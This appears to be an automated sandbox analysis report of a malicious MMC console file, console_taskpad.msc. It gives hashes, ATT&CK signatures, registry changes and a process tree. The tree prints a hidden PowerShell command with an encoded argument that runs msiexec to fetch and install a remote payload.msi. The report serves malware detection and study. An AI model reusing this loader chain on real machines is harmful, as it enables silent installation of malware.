Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-09-2024 12:29
Static task
static1
Behavioral task
behavioral1
Sample
console_taskpad.msc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
console_taskpad.msc
Resource
win10v2004-20240802-en
General
-
Target
console_taskpad.msc
-
Size
89KB
-
MD5
2eb6d269b47a185ee8f7b01a9119f3b9
-
SHA1
1563289aa3f9561c72982500192e6d64c1c54d33
-
SHA256
690a71fe18b9191bebfcfedeb4873b49d6601df9ba25e3bf13b3b00783cc474c
-
SHA512
16beb9a1ad5f498cd99c5470047ce7ffee0affac28d921a4b948e296f853d32ca77ce1091fb3bf052e58bc7a7f5886752788159136b4067a7e4fbb601c0096cb
-
SSDEEP
384:TOA5bzsRKLRkJ/6ke1Wt7qGWtqykfqrV6Ekh:6gbwVgWTUV6Ekh
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4400 powershell.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 692 msiexec.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch mmc.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" mmc.exe Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\IESettingSync mmc.exe Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" mmc.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4400 powershell.exe 4400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: 33 716 mmc.exe Token: SeIncBasePriorityPrivilege 716 mmc.exe Token: 33 716 mmc.exe Token: SeIncBasePriorityPrivilege 716 mmc.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeShutdownPrivilege 692 msiexec.exe Token: SeIncreaseQuotaPrivilege 692 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 692 msiexec.exe 692 msiexec.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 716 mmc.exe 716 mmc.exe 716 mmc.exe 716 mmc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 716 wrote to memory of 4400 716 mmc.exe 95 PID 716 wrote to memory of 4400 716 mmc.exe 95 PID 4400 wrote to memory of 692 4400 powershell.exe 97 PID 4400 wrote to memory of 692 4400 powershell.exe 97
Processes
-
C:\Windows\system32\mmc.exeC:\Windows\system32\mmc.exe "C:\Users\Admin\AppData\Local\Temp\console_taskpad.msc"1⤵
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -encodedCommand bQBzAGkAZQB4AGUAYwAgAC0AaQAgAGgAdAB0AHAAOgBcAFwAXABcAGwAbwBjAGEAbABoAG8AcwB0AFwAXABwAGEAeQBsAG8AYQBkAC4AbQBzAGkA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" -i http:\\\\localhost\\payload.msi3⤵
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:692
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82